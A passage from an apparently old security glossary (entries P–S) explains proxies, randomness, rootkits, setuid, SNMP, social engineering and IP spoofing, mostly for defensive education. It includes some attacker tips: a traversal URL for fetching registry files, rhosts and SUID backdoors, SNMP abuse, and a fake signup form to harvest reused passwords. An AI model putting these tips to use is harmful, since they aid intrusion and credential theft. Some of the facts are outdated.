Transport Layer SSL is essentially encryption at the transport layer.

Network Layer IPsec provides encryption at the network layer, encrypting all the contents above IP, including the TCP and UDP headers themselves.

proxy [3]

In communications, a proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.

Analogy: Consider talking to somebody who speaks a foreign language through a translator. You talk to the translator, who receives your statements, then regenerates something else completely to the other end. The translator serves as your proxy.

Key point: The communication terminates at the proxy. In other words, the proxy doesn't forward data so much as it tears it completely apart. For example, an HTTP proxy doesn't forward every request sent through it. Instead, it first examines if it already has the requested web page in its cache. If so, then it returns that page without sending another request to the destination server. Because proxies completely terminate the communication channel, they are considered a more secure firewall technology than packet filters, because they dramatically increase the isolation between the networks.

Key point: You will occasionally be scanned for proxies. ISPs scan their users for proxies. Hackers scan the Internet looking for proxies they can anonymize their connections with. Certain servers (like IRC servers) scan clients for proxies in order to prevent anonymous connections. Several websites maintain lists of such proxies. e.g. http://proxys4all.cgi.net/

public-key (private-key) [3]

TODO:

Key point: Protecting the "private key" from theft/disclosure is the most important thing any company can do. There is exist private keys whose value lie in the range of hundreds of millions if not billions of dollars (such as the key Verisign uses to sign certificates).

The private key is usually protected with strong encryption based upon a strong password. In paranoid cases, parts of the password are given to different people, so that more than one person must be present in order to recover the private key for use (note: redundancy is also used, if the the key is XYZ, then Alice knows XY, Bob knows YZ, and Charlene knows XZ, meaning that any two can unlock the private key).

The paranoid things you see in movies about high-security installations apply:

background checks on employees with access to the private key
physical security consisting of photo IDs, searches, and strick entry/exit controls
the two-person rule
biometrics (retina/palm/finger/handwriting) additions to normal authentication
physical keys

Private-keys are frequently stored on separate objects. The most common is the floppy disk, which can be inserted into a server when booted, but removed to a safety deposit box. Other examples include crypto-cards. (Note: when you get a certificates from a CA, they usually require that the private-key never be stored on a computer).

Servers that must use private keys must employ heavy countermeasures:

intrusion detection systems
firewalls (both packet filtering as well as more complex ones)
frequent vulnerability assessments and auditing
limited people who have access to the server
full use of the security features of the server (i.e. turn on logging, enforce strong passwords, etc.)

- Q -

quantum computing [4]

Quantum mechanics challenges our notion of reality in much the same way that heliocentricity (sun at center of the solar system) challenged people in the 1600s. Quantum computers don't necessarily make computers faster, but can they make exponential problems tractable. In other words, they won't make your game faster, but they can be used to crack encryption keys infinitely faster.

Analogy: Consiser a basketball player who shoots a perfect shot aimed right towards the basket. However, an intervening player intercepts the shot and blocks it. Quantum mechanically, the basketball simulataneously was blocked and went into the basket. The act of obververs watching the game caused reality to snap into focus along one state or the other. Of course, quantum mechanics don't apply to basketballs but they do apply to photons (little balls of light). So far, the best explanation for the behaviors of photons is much like the basketball game above. It makes no intiutive sense.

Details: A half-silvered mirror reflects roughly half the light and lets the other half through. However, light is carried by photons (aka. quantums). If you shine a laser light at a half-silvered mirror, it appears that roughly half the light goes through and the other half is reflected. There are three ways of interpreting this:

roughly half the photons take the reflected path, the other photons take the straight-through path
each photon is split in half (into smaller photons), each half traveling a different path
each photon is both reflected and not-reflected at the same time, and the act of observing the photon long after it passes the mirror causes it to decide which path it took

Option number three makes no sense, but is the only one that matches experiemental evidence.

Key point: A quantum bit, or qubit, holds two values just like a normal bit. However, quantum bits can be combined such that two qubits hold four values, three qubits hold eight bits, and four qubits hold 16 values. Thus, just 30-qubits can store a gigabyte of information. It isn't that easy, but the upshot is that a quantum computer can address exponential problems because it can apply exponential resources to the them.

Key point: So far, it seems that the most useful form of quantum computing is quantum cryptography. Researchs have shown ways to crack symmetric keys, factor large numbers to break public keys, and exchange keys.

- R -

Rainbow Series [2]

A series of books published by the NSA on evaluating "Trusted Computer Systems (TCS)". The are generally two types of security people: those that come from government/big-business/military who use terms will defined in the rainbow series vs. more relaxed long-hair types that use colloquial terms from the hacker community.

random [4] . .

Key point: Most software-based random number generators are not cryptographicaly secure. As a result, many cryptosystems have been broken by attacking the generator of session keys. Versions of Netscape and Microsoft browsers have been broken this way. For example, Netscape used the current time and process ID to seed its random number generator.

Key point: Modern computers come with hardware-based random number generators that base their seeds upon electronic noise. This solves the problem of the impossibility of pure-software random number generators of being truely random, or the inefficiency/hackability of entropy-gathering random number generators. These are either in the CPU, the chipsets, or crypto hardware.

Contrast: Software random number generators cannot be perfectly random, so they are called pseudo random number generators (PRNG). Because they cannot generate perfectly random numbers, they usually query the user for some random seed information when they startup. For example, when you install PGP, you type at the keyboard some random text. The program measures the time spacing between keystrokes, then saves that information in a file. That file then serves as the seed information for future cryptographic purposes. For the most part, such seeds are considered strong enough for cryptographic purposes because they represent more bits of information used in most keys. * A PRNG is in contrast to a TRNG (Truely Random Number Generator).

Key point: Software random number generators generally start with a single seed from which all other numbers are generated. This can be used as a pre-compression mechanism: if you need to generate lots of random data, then store it, you can instead simply store the seed for the pseudo-random number generator. For example, the game "Diablo" generates a random level every time. They could base this on a seed, and simply store the seed and regenerate the level accordingly. They don't -- which leads to lots of disk space being used up.

Key point: The output of hash or encryption algorithms produce what appears to be random data. In fact, their security depends upon this. The goal of cryptanalysis is to hunt deep within the data for patterns. As a byproduct, this also means that cryptographic algorithms can also be used as a pseudo-random number generator.

Key point: There are systems known as entropy-gathering PRNGs: they gather some entropy from the environment and whiten it with standard PRNGs (such as hash functions). Sources of entropy in the system are:

keyboard interupts
mouse movements
disk interupts (whose timing is dependent upon when the disk head seeks to the correct position).
current timestamp
clock skew from real time (i.e. if your internal PC clock needs to be adjusted by 1.3 seconds per week, you can throw that into the PRNG).
network traffic
memory access times
any other system interupt

There exists such a system for UNIX called /dev/random, which represents a "file" containing totally random information. Similar device drivers for DOS; ("NOISE.SYS") generates a pseudo file called "RANDOM". While APIs already exist to access this info, having a pseudo file makes the code more easily portable.

Key point: The randomness or entropy of a system can be measured. The table below lists some algorithms that measure entropy, and their measurements when run against this document:

Algorithm Description My entropy

ent http://www.fourmilab.ch/random/ 5 bits

MUST
(Maurer's Universal Test) Another measurement system. 4 bits

Diehard TBD ?

WinZIP By definition, a compression program reduces redundancy. Therefore, the percentage compression is a fair measure of entropy. Compresses this file down to 18% its original size, which one can consider an entropy of 1.5 bits per byte. 1.5 bits

Algorithm	Description	My entropy
ent	http://www.fourmilab.ch/random/	5 bits
MUST (Maurer's Universal Test)	Another measurement system.	4 bits
Diehard	TBD	?
WinZIP	By definition, a compression program reduces redundancy. Therefore, the percentage compression is a fair measure of entropy. Compresses this file down to 18% its original size, which one can consider an entropy of 1.5 bits per byte.	1.5 bits

Note that ent and MUST are good measurements of randomness only if the input is nearly random. WinZIP is only a good measure of randomness if the input is mostly redundant. For example, MUST claims that my WinZIP file is 99.7% random, and ent claims it is 99.92% random. These are closer to being accurate.

Misconception: It is pointless measuring the entropy/randomness of anything whitened by a hash function or encrypted, unless you are measuring the hash/encryption function itself. For example, when evaluating a system that gathers entropy (described above), measure that data before it gets whitened.

race condition [3]

In computer science, the term race condition refers to when two processes attempt to carry out conflicting actions at the same time. It is said that these two processes race to see who completes first. They exist throughout code because under normal conditions, one process tends to be faster than another and completes first (and if that is the expected outcome, the bug is never detected). By slowing down one process or speeding another, hackers can exploit race conditions in order to break into systems. These are typically only local exploits.

Analogy: Create a file on the disk called "rob.txt" containing the word "foo". Open the file in an editor and add the word "bar". However, before saving the file open it again in another editor and add the word "baz". Now save the first file, then save the second file, and exit both editors. The file now contains "foo baz", and the changes for "bar" are completely lost. Note: this may not work for you, because some editors check for this condition so that you can't make a mistake.

RC4 [3]

Rivest Cipher 4 A symmetric block cipher developed by RSA.

Uses:

SSL, which means RC4 is built into your browser.
CDPD (Cellular) connections for your Palm modem using OmniSky.

Key point: RC4 supports variable length keys, but US restrictions limit it to 40-keys when US companies export products using RC4.

Key point: RC4 was a trade secret until somebody reverse engineered it and posted the source code on the net. It isn't patented. Therefore, RSA is trying to move all its customers to RC5, which is both patented and copyrighted.

RC5 [3]

The successor to RC4.

Key point: In order to promote RC5, RSA conducts contests that pay people if they can crack it. The first contest used a 56-bit key, took 212 days to crack by http://www.distributed.net/ using a total of roughly 1-million computers trying all possible 35,000,000,000,000,000 combinations. The message was "It is time to move to a longer key length.", and it was encrypted using the key 0x532B744CC20999.

RDO (Remote Data Objects) [2]

TODO

referer [4]

A field within the HTTP header that tells the server the hypertext link that the browser followed when requesting the file. This field was designed to enhance the browsing experience. For example, when you follow a link from a search engine, a website can parse out the search terms you looked for and reformat the webpage with those terms highlighted.

Example: Below are examples of Referer fields from people who hit my website.


http://www.google.com/search?q=sniff+program+network

http://www.google.com/search?q=cable+%22port+scan%22&num=100

http://mc9.metacrawler.com/crawler?general=sub%2Bseven&method=0&sid=53403613mc9_22_16&sno=23858&domainLimit=0&rpp=20&timeout=0&hpe=10&format=regular&power=0&refer=nav&start=20

http://www.google.com/search?q=network+sniffer+detector

http://www.google.com/search?q=registered+dynamic+ports&sa=Google+Search

http://infoseek.go.com/Titles?qt=%22windows+sniffer%22&sv=IS&lk=noframes&svx=sbox_nohit&cc=WW&oq=%22win98+sniffer%22

http://search.excite.com/search.gw?c=qb&s=%2Bresonate+%2Bwarez&showSummary=true&start=0&lang=en&perPage=10&next=Next+Results

Key point: The refer When combinedCookies are not a security hole in themselves. However, they can be combined in interested ways with other browser features in order to create big security and privacy holes.

Registry [3]

On Windows, all configuration information is stored in a series of files known as hives. Programs read/write this configuration information using special Windows APIs.

Key point: On WinNT machines, the registry can often be remotely accessed. Some portions can even be read without a password.

Key point: Many programs cache passwords in the registry, often in clear-text or only slightly obfuscated.

Key point: Trojan horses often place themselves in a "Run/RunService" registry entry in order to be automatically launched on the next reboot. Double-check these entries in order to improve the security of your system.

Key point: Win95 stores the registry in c:\windows\system.dat and c:\windows\user.dat (and backups in *.da0 instead of *.dat). If you can get to a Win9x system, then you can often read these files. For example, many personal webservers (ICQ, FrontPage98, etc.) allow a URL of the form http://victim/.html/....../windows/user.dat that can fetch the files. Many cached passwords are stored in the registry, so getting these files is very important.

relay [3]

E-mail relay is where spammers hijack an e-mail server in order to forward their spam through the server. Usually, the spammer (from the Internet) sends the e-mail server a single e-mail with thousands of recipients.

Key point: This allows a spammer with a dial-up account to send e-mail as fast as a high-speed Internet connection, since it is the victim who breaks apart the recpient list and sends each person a separate copy. Therefore, one e-mail goes into the server, thousands come out.

Key point: Relaying can be turned off in the e-mail server configuration. Such configuration will force the server to accept either incoming mail, or outgoing mail, but not incoming e-mail destined back out to the Internet. There are several sites on the Internet that will scan your corporate e-mail server to see if will relay spam.

Resource: Paul Vixie's MAPS http://maps.vix.com/ (MAPS is SPAM spelled backwards).

remote administration trojan (RAT) [2]

A trojan that when run, provides a hacker remote administration to the machine.

Contrast: A trojan is any program with a hidden intent. A RAT is one whose hidden intent is to remotely control the machine. In particular, once the program is run and installs itself as a hidden background service, it ceases to a trojan in the classic sense and is now better thought of as a rootkit.

Example: Back Orifice, NetBus, SubSeven, Hack'a'tack

Contrast: A remote administration trojan is not a virus. The general populace uses the word virus to apply to any hostile program a hacker might use. Normally, being a purist using the correct word is futile, but in this case the distinction is important. You catch viruses accidentally, and the virus rarely does anything hostile to your system. Conversely, when a hacker attempts to infect your system with a remote administration trojan, the hacker is attacking you personally.

Key point: Infections by remote administration Trojans on Windows machines are becoming as frequent as viruses. One common vector is through File and Print Sharing, when home users inadvertently open up their system to the rest of the world. If a hacker has access to the hard-drive, he/she can place the trojan in a location known as the startup folder. This will run the trojan the next time the user logs in. Another common vector is when the hacker simply e-mails the trojan to the user along with a social engineering hack that convinces the user to run it against their better judgement.

replay [3]

A replay attack is a type of sniffer attack where the traffic is captured then retransmitted back at a computer.

Analogy: In the 1992 movie Sneakers, the victim uses a voice identification system. Therefore, the heros record the voice of one of the victim's employees, edit it with a computer, then play it back into the voice recognition system.

Key point: It seems the first generation of any security architecture is vulnerable to replay attacks. For example, IPsec was original vulnerable to some replay attacks, even though it had provisions against the most obvious ones.

Key poitn: The anti-replay remedy is to include a timestamp with a message. This then implies that everyone needs to have their clocks synchronized in order to communicate correctly.

Resource Kit [3]

Microsoft supplies a set of useful tools in a "Resource Kit". There are different kits for Win98, WinNT, and Win2k.

Key point: The resource kits contain numerous tools to help system administration. Therefor, these tools are extremely useful for hacking. Any hacker interested in compromising Windows has a copy of the Resource Kit.

Key point: These tools aren't "dangerous". They don't provide any capabilities that hackers couldn't program for themselves. These tools are useless against secured systems.

reverse engineering [3]

A technique whereby the hacker attempts to discover secrets about a program. Some reverse engineering techniques are:

strings: Dumps all the human-readable strings within a program. In 1999, hackers looked for "strings" within Microsoft's products and found something labeled NSA_KEY. This led the paranoid dillusion that the NSA had somehow convinced Microsoft to put a backdoor key into the system. Similarly, early in year 2000, hackers discovered strings like GetPrivateProfileString in the BlackICE Defender personal firewall and made paranoid assumptions (in reality, GetPrivateProfileString is a standard Win32 function). The most commonly used tool for this is the program strings included with UNIX.
disassemble: Takes the compiled output of a program and retrieves the original assembly language mnemonics, which are easier for humans to read. For example, the byte "0x90" might be converted back into NOOP (no operation) instruction. An example of using this technique to discover code being sent across the wire is at http://www.robertgraham.com/pubs/aol-exploit. The problem with disassembly is that it only makes the object files slightly more readable -- it doesn't reconstruct the full original source code or comments.
decompile: Decompilation produces high-level source code from an executable. The technique has proven essentially worthless for languages like C/C++, but works well on languages like Java, VisualBasic, and Delphi. It still doesn't obtain the original comments, however.

Reverse engineering is often used to:

anti-virus: Discover how viruses work in order to write more effective signatures against them.
cracking serialz: Figuring out how copy protection works in order to break it.

rhosts [3]

On UNIX, the "rhosts" mechanism allows one system to trust another system. This means that if a user logs onto one UNIX system, they can further log onto any other system that trusts it. Only certain programs will use this file:

rsh: Tells the system to open a remote "shell" and run the specified program.
rlogin: Creates an interactive Telnet session on the other computer.

Key point: A common backdoor is to place the entry "+ +" in the rhosts file. This tells the system to trust everybody.

Key point: The file simply contains a list of named hosts or IP addresses. Sometime the hacker can forge DNS information in order to convince the victim that he has the same name as a trusted system. Alternately, a hacker can sometimes spoof the IP address of a trusted system.

rip [2]

In the underground culture, the word rip means to make a copy of. Often, this has the connotation of making an illegal copy of a copyrighted work. The most common examples are programs that rip music CDs, or site rippers that download a complete copy of an entire web-site.

root (superuser, administrator)[1]

On UNIX, root is the superuser or administrator account that has complete control over everything in the machine.

Key point: The term can be used as a verb. To "root" machine is to break in and obtain root privileges, and their own the machine.

rootkit [3].

Key point: A rootkit contains many trojaned programs. These programs are used to allow the hacker entry back into the system and to hide the presence of the hacker. For example, a trojaned "ps" command might hide the hacker's sniffer daemon from appearing in the process list. Alternatively, the hacker might trojan an existing daemon like inetd to run a background sniffer.

Key point: The most important trojaned programs are those that deal with gaining access back into the system with a special password. Therefore, trojaned versions of login daemon, su, or telnetd are needed.

Key point: Rootkits often contain setuid programs that normal users can run in order to elevate their privileges to root. Look for these in order to see if your system has been hacked.

Culture: Also called "daemon kits".

RPC (Remote Procedure Call)[4] .

A popular UNIX network protocol, RPC allows programs on one machine to make a "procedure" call on another machine. The upshot of this is that you could split a program in two halfs, each part running on a separate machine. The procedure calls are invisibly mapped so that the programmer doesn't have to worry about the details.

Contrast: The oldest form of RPC in use is Sun's RPC, upon which many famous protocols (such as NFS) are based. A newer form known as DCE RPC is used by Microsoft as the basis for its RPC services. The DCE version is dramatically more complex than the Sun variant, but supplies more services (such as built-in security).

History: In the year 1999 (and early 2000), a wave of hacker attacks against Sun's RPC services swept the net. Virtually any Sun box connected to the net whose default RPC services were enabled, was hackable. Many Linux boxes were also hackable through RPC-based services. Virtually all of these attacks where through buffer overflow exploits.

RSA [1]

RSA is the name of the most prevalent public/private key cryptosystem. It is also the name of the company (RSA Security) that essentially holds the patent rights to this system.

Key point: RSA forms the basis for X.509 certificates in web servers and browsers.

Key point: RSA Security charges a hefty license to use the RSA algorithm. However, the patent expires in September of the year 2000. At that time, the number of products using the RSA algorithm are likely to explode.

Key point: An alternative to RSA is the "Diffie-Hellman" algorithm. This is used in many cases, but it is hampered by the fact that many products that could use it (like Netscape and Microsoft browsers) do not; for interoperability you often need to use RSA over DH.

RSAREF [5]

RSA Reference Implementation. This was a fairly "open" implementation of the RSA algorithm that has been embedded into many problems. This is not the source code that RSA sells to vendors, but an "open source" version that has been imbedded within freeware/open-source products (like ssh). A patent-license is still required when using this code in commercial products, though.

Key point: RSAREF has been been supported by RSA (the company) for a long time, and a number of security holes have been found in this implementation. RSA wants people to use the BSAFE developement kit instead. In late 1999 in particular, a bug was found that allows ssh to be hacked.

- S -

SAM (Security Access Monitor) [3]

TODO:

samples [3]

Many systems ship with samples that demonstrate how the product can be used. Since these samples aren't intended to be used in production systems, they have significantly less security than other components of the system and can frequently be hacked.

See also: defaults

SATAN (Security Administrator Tool for Analyzing Networks)[3]

A vulnerability scanning tool designed to hunt for numerous ways into a system. Much hyped at the time; people feared that it would give a powerful tool into the hands of hackers everywhere. In practice, it was a dud: it was much to "noisy", was already outdated by the time it was released, was impossible to setup, and hasn't been really maintained.

scan (scanner)[2]

This word is overused to the point that it is frequently confusing what people are talking about. The problem is that a scanner can be either active or passive.

Example: There are variations of virus scanners:

background scanner: Scans for viruses continuously in the background.
on-access scanner: Scans a file for viruses whenever it is accessed.
on-demand scanner: Scans the hard disk looking for viruses whenever told to by the user.

scavenge [4]

Connection scavenging is a technique whereby hackers dialup to the Internet hoping to find connections left dangling when somebody else abruptly hung up.

scripts [2]

Programs written to take advantage of a particular exploit.

Key point: Elite hackers write scripts, script-kiddies run scripts.

Misunderstanding: A lot of "scripts" are written in scripting languages like PERL, but a lot are distributed in C/C++ source form as well.

script-kiddies [2]

A type of hacker who knows how to do little more than run pre-packaged scripts against computers hoping to break into them. The technical knowledge of the script-kiddy is often less than the average computer user. They are usually trained in the operation of scripts by some sort of mentor, and they generally believe that such things happen by "magic".

server [1]

An extremely generic term that can apply to most anything. Generally, things called servers respond to requests sent to them by clients.

Examples:

Web sites are hosted on web servers
The trojan dropped onto a victims machine for remote administration is called the server portion. Script kiddies frequently run the server portion instead of the client, accidentally infecting themselves.

Misconception: An X Windows terminal is called an X server. This is unexpected because generally anything a human interacts with is the client. However, remember that the X Windows protocol allows a program to draw images on a screen. Therefore, the services being performed are image-drawing services. QED: whoever requests that an image be drawn is the client, and whoever carries out the action is the server. It is the terminal that actually draws the images on the screen, hence the terminal is the X server.

sendmail [2]

The most popular program on the Internet used to forward e-mail. Sendmail is also the most complex e-mail system. The combination of being extremely popular and extremely complex as resulted in a huge number of hacking exploits.

History: In 1989, Morris Worm exploited sendmail bugs as one technique to spread itself.

setuid (SUID) [3]

UNIX programs that can be run by a user, but which have root privileges.

Key point: In theory, setuid programs can only be installed by root, and they are considered as part of the operating system, because they inherently bypass security checks and must verify security themselves. A typical example is the passwd command, which a user runs in order to change his/her password. It must be setuid, because it changes files only root has access to, but yet it must be runnable by users.

Key point: In practice, setuid programs often have bugs that can be exploited by logged in users.

Key point: As part of hardening a system, the administrator should scour the system and remove all unnecessary setuid programs. TODO: show the command to do so.

Key point: Some programs are really setguid which only changes the group context rather than the user context.

Key point: Windows doesn't have the concept of setuid. Instead, RPC is used whereby client programs (run by users) contact server programs to carry out the desired task. For example, in order to change the password, the client program asks the SAM to do it on behalf of the user. Thus, whereas UNIX requires a myriad of client programs to verify credentials and be written securely, Windows only requires a few server programs to do the same.

Key point: A common way to backdoor a system is to place a SUID program in the /tmp directory.

shared media [4]

Networks like Ethernet whereby multiple computers connect to the same wire.

Key point: In such systems, any computer on the wire can eavesdrop on its neighbors.

Contrast: Most corporations are replacing their shared media nets with switched connections.

shared secret [4]

The idea that many people share the same password or key. Shared secrets are widely use because they are easy: there is simply one password to give out. On the other hand, the more widely secrets are shared, the more likely it will become compromised. In fact, many people believe that even sharing a secret among two people is extremely risky, where the proper solution is using public keys to distribute a randomly generated key only valid for the particular message.

Example: DVD movies are encrypted with a randomly generated key. This key is then is then encrypted multiple times with hundreds of different keys. Every DVD player vendor owns one of these keys and imbeds it in their device, thus allows that player to decrypt the movie. (Presumably, if one of the keys is compromised, future movies can be generated without the offending key, causing players based upon that key to become obsolete). However, there is no good way to protect these keys, even though they are in hardware. In late 1999, students in Europe where able to break one of these keys (the Xing software DVD player), and from there they were able to break the majority of the other keys. (These keys only used 40-bit encryption, so breaking one key in the software player allowed a known-plaintext attack).

shell [3]

The default command-line interface on UNIX systems.

Key point: This is similar to the "Command Prompt" or incorrectly named "DOS Prompt" on Windows systems.

Key point: Many systems pass filenames along with commands directly to the shell. Hackers can exploit this by sending special shell characters (like the pipe | character) as part of filenames in order to execute their own commands. This is an example of an input validation exploit. Examples of this are web-servers, PERL scripts, and CGI scripts.

Key point: The most popular shell among hackers is probably "bash", the shell from GNU that ships with Linux. (Culture: The original shell on UNIX is known as the "Bourne Shell", named for its creator. The acronym "bash" means "Bourne Again SHell", reflecting that fact that it is a rewrite of that shell).

Key point: Retrieving someones .bash_history file is a common attack against UNIX machines. Several embedded systems have shipped such that the file http://raq.robertgraham.com/~root/.bash_history could be retrieved via the web.

Key point: The holy grail of UNIX hacking is to somehow obtain (or re-obtain) a root shell. In other words, the hacker wants to get a command-line on the victim system in order to carry out any task. For this reason, buffer overflow exploits often contain what is called "shell code". When the victim process is running with root privileges, the buffer-overflow will cause that process to beging running a shell. For example, an exploit might send a long password containing the shell code to an FTP server, converting the TCP connection to the FTP server into a full command-prompt from which any program can be launched.

shoulder surfing [2]

Slang for watching somebody type their password on their keyboard. In much the same way that hackers teach themselves to read upsidedown (in order to read documents when seated in front of a desk), hackers can also practice watching people type on the keyboard.

Analogy: Crooks often steal credit card numbers in the same way. They stand behind people in line and read their credit cards as they sit on the countertop during processing.

sign [3]

TODO

signature [3]

In anti-virus and intrusion detection systems, a signature is a pattern that the system will will look for when scanning files or network traffic.

Key point: Marketing forces often mean that companies have to fill their products with useless signatures. Don't be impressed because one product has more signatures than another.

Key point: One of the key goals of hacking is to evade signature detection. Virus writers attempt to encypt their viruses, whereas remote hackers attempt to alter the networking protocol so that it has the same effect, but a different pattern on the wire.

signature [3]

In cryptography, a signature (or digital signature) is something (usually a private-key encrypted hash) that verifies the integrity of a message.

Example: Microsoft's Authenticode allows application developers to sign their programs. Any alteration to the software will result in an invalid signature. Therefore, hackers can't add trojans/viruses to commercial software without it being detected.

Key point: Digital signatures only work if people check them. People rarely check signatures in e-mail or software.

smart card [3]

TODO A smart card is an authentication scheme whereby a user must possess a card with electronics in order to achieve access.

SMB [3]

SMB is the protocol used by Microsoft for file and print sharing. SMB stands for Server Message Block, though that doesn't really mean anything. SMB runs on top of NetBIOS, though in Win2k it can bypass NetBIOS.

History: SMB was originally developed for DOS machines. It was later upgraded so that OS/2 machines could act as servers for DOS machines. The protocol was later upgraded for Windows (Wfw = Windows for Workgroups) and Windows NT. Still later upgrades have been added for Windows 2000. This constant evolution and need for backwards compatibility has led to numerous security holes within the protocol. The most severe is the need for "LAN Manager" authentication.

Key point: SMB is an appliation layer protocol and can run over many different transports, including TCP/IP. A common problem is that home-users enable SMB over TCP/IP, allowing anybody on the Internet to access their hard-disk. They should instead install a local-only transport such as NetBEUI for SMB, which will allow file access among local machines, but not remote machines across the Internet.

SMTP (Simple Mail Transfer Protocol [3]

Key point: Virtually all e-mail exchanged on the Internet is through SMTP.

Key point: The most common exploits for SMTP involve spammers trying to relay mail through high-speed mail servers.

sniffer [1]

A wiretap that eavesdrops on computer networks.

Key point: You have be between the sender and the receiver in order to sniff traffic. This is easy in corporations using shared media, but practically impossible with an ISP unless you break into their building or be an employee.

Key point: Sniffers are frequently used as part of automated programs to sift information off the wire, such as clear-text passwords, and sometimes password hashes (to be crack).

Further reading: http://www.robertgraham.com/pubs/sniffing-faq.html.

SNMP (Simple Network Management Protocol)[3]

The Internet infrastructure is composed of lots of hardware scattered around the place. SNMP is the method that allows someone to "manage" all that equipement. By the word "manage" I mean do things like monitor the amount of traffic flowing through the equipement, trigger when faults occur, change the configuration of equipment remotely, and so forth.

Key point: Most equipement comes with default passwords (aka. community strings) of public and private. These allow you to read information from the device (traffic, temperature, voltage, etc.) and re-configure it.

Key point: A common technique is to traceroute to a victim's dial-up machine thereby discovering the IP address of the hardware they've diale into. Then, you can send SNMP commands with the "private" community strings telling the hardware to hang-up on the victim.

social engineering [3]

Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazened across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practicers are the marketing departments of corporations.

Key point: The classic example is to pretend to be from a company's computer department and call up a user asking for their password. Sophisticated hacks will first try to make the victim uncomfortable (i.e. "We've detected improper use of your account..."), then offer them the opportunity to be very helpful ("I'm sure we can check this out now and not involve your boss."). The technique often works well in reverse: call up the computer support department and tell them you've lost your password. This works especially well in companies that have policies requiring you to change your password -- people forgetting passwords on really old accounts are frequent, so support departments are deluged with such requests, so it's easy to slip one past them.

Key point: Know as much about your victim as possible. If you are emulating something, try to find the answers to typical questions you will be asked.

Key point: If all else fails, try stupidity. If you are a foreigner, pretend not to speak the language well. Likewise, females have certain advantages in male-dominated cultures.

Example:

For members-only access, please create an account:
Username:
Password:
Confirm:

People often choose the same password for everything. For example, put in your website the prompt shown to the right. A lot of users will use the same username/password for this that they use for websites like Hotmail, Yahoo mail, or Netscape mail. This will therefore sift valid e-mail accounts from people who visit your site. In a similar manner, these passwords might be useful within the companies they work for as well.

Key point: Newbies are favorite victims of social-engineering attacks in chat rooms. Hackers go after people who appear to be unsure of themselves online.

Key point: Many hackers do not consider social-engineering a "real" attack because it doesn't require extensive technical knowledge in order to pull off.

sockets / WinSock [4]

In programming, the "sockets" interface is the most common way that coders use to access the network. Sockets works by creating a "file handle" that when written to, sends data over the network rather than to a file on the hard-disk.

Contrast: Other interfaces programmers could use are higher-level abstractions like RPC, or lower-level "raw" interfaces like libnet.

Contrast: Sockets originally came from UNIX, but has been ported to other platforms. In particular, the "WinSock" variant for Windows includes both the UNIX-style functions as well as the Windows-style functions. It is possible to write sockets-based programs that compile for both platforms.

Key point: The name "sockets" comes from the TCP/IP term "socket". A socket is minimum information necessary needed to communication on the network: the source/destination IP address, the source/destination port, and the transport protocol (UDP or TCP).

SOCKS [3]

SOCKS is a service that allows internal machines behind a firewall/proxy/gateway access to the Internet. Rather than talking to the target machine, clients communicate with the SOCKS server and ask it to relay data to the target machine out on the Internet.

Key point: SOCKS servers are frequently misconfigured allowing both outside and inside people to use them. This means that if a hacker wants to hide where they come from, the hacker scans the Internet for SOCKS proxies, then funnel their data through the proxies they find. When victims trace back to the hacker's IP address, they find the open SOCKS server instead.

Key point: Abuse through SOCKS servers has become so common on IRC networks that many of them (dalnet, undernet) have begun scanning clients to see if they are running an open SOCKS proxy. They deny access to anybody coming into the networks through such a proxy. Note that users can still use closed proxies (i.e. those available only to internal users).

Key point: SOCKS servers listen by default on TCP port 1080.

Real world: Most browsers support SOCKS, which you can see in the "proxy" settings configuration tab. You can download generic SOCKS clients and servers from http://www.socks.nec.com/.

solaris [3]

TODO: talk about common exploits for solaris

source route [4]

In network network protocols, source routing is the capability whereby the sender can specify the route a packet should take.

Analogy: Somebody asks you how to get to the freeway. You can give them two responses:

You tell them to drive a little further on, and there will be signs pointing to the freeway. You tell them just to follow the signs. This is normal routing: you simply hand the packet off to the routers, and let them worry about which direction the packet takes.
You tell them to drive up 3 blocks, turn left, then go 2 blocks, then turn right, then go one more block and bear left onto the onramp. This is source routing: you tell the packet every hop it should take through the network.

Key point: The hacker can give the packets routes that go around firewalls.

spider [3].

An automated program that reads webpages from a website, then follows the hypertext links to other pages. If the Internet is a "web", then a spider is something that follows the strands of the web.

Key point: A website can use the file "robots.txt" to give hints to spiders what they should, or should not, index. A big problem with websites is that spiders are really good at finding webpages, even those that website operaters don't care to be exposed. However, users can still find these pages due to hits from search engines. Website operators can therefore "hide" pages by listing them in "robots.txt". However, hackers will therefore read "robots.txt" in order to find webpages that website operators want hidden.

Example: Spammers use spiders to sift through web pages looking for e-mail addresses. For example, if you have a link that looks like <A HREF="mailto:spexamp@reckoning.robertgraham.com">me</A> then the spam spider will find the address and funnel spam to you. A partial defense against this is to URL-encode your e-mail address, which hides it from most spam spiders, but works in most browsers. See the page at http://www.robertgraham.com/tools/mailtoencoder.html for an example.

Contrast: A spider pulls information inward; a worm pushes itself outward to other systems. A spider is a type of 'bot, rather than infectious malware like viruses, trojans, or worm.

spoof [3]

The word "spoof" generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing).

Analogy: When you send a letter via normal post (snail mail), you write the recipient's name and address on the envelope. You typically also write the sender's name and address as well, so that if there is an error forwarding you letter (e.g. a stamp falls off), they know who sent the letter and can return it. However, you can easily spoof it. For example, someone I know absolutely had to send a letter, but had no stamps. So he simply put the actual recipient's name as the return address section of the envelope and dropped it into the mail box. The letter was returned to sender, which of course arrived at the intended recipient.

Misunderstanding: Most people are interested in spoofing because they think it will allow them to hack a machine in a completely anonymous manner. It doesn't work this way. For example, Mitnick used IP spoofing in order to attack Shimomura's computers, but was caught anyway because spoofing does not truely hide the attacker. The problem is that all responses go back to the sender, so if you've spoofed the sender, you'll never see the responses. Therefore, the spoofing is useless for any normal activity. On the other hand, spoofing can still be useful in situations where seeing the response is not necessary. In the Mitnick instance, two machines trusted each other. Therefore, Mitnick was able to emulate and entire connection between the two machines by "predicting" what all the responses would be. He used this connection to open up something on the victim machine that he could then connect to normally. It was precurser scanning the and the post-spoof connection that Shimomura used to catch Mitnick.

Example: A particularly nasty form of a spoofing is TCP sequence number prediction. Theoretically, you cannot spoof any protocol based upon TCP connections. This is because both sides of a TCP connection choose their own Initial Sequence Number (ISN). In theory, this is a completely random number that cannot be guessed. In practice, it can sometimes be easily guessed. Mitnick used this technique when hacking Shimomura. As of the end of 1999, operating systems such as Linux, WinNT, and Win2k have implemented truely randmon ISNs in order to defeat this type of attack.

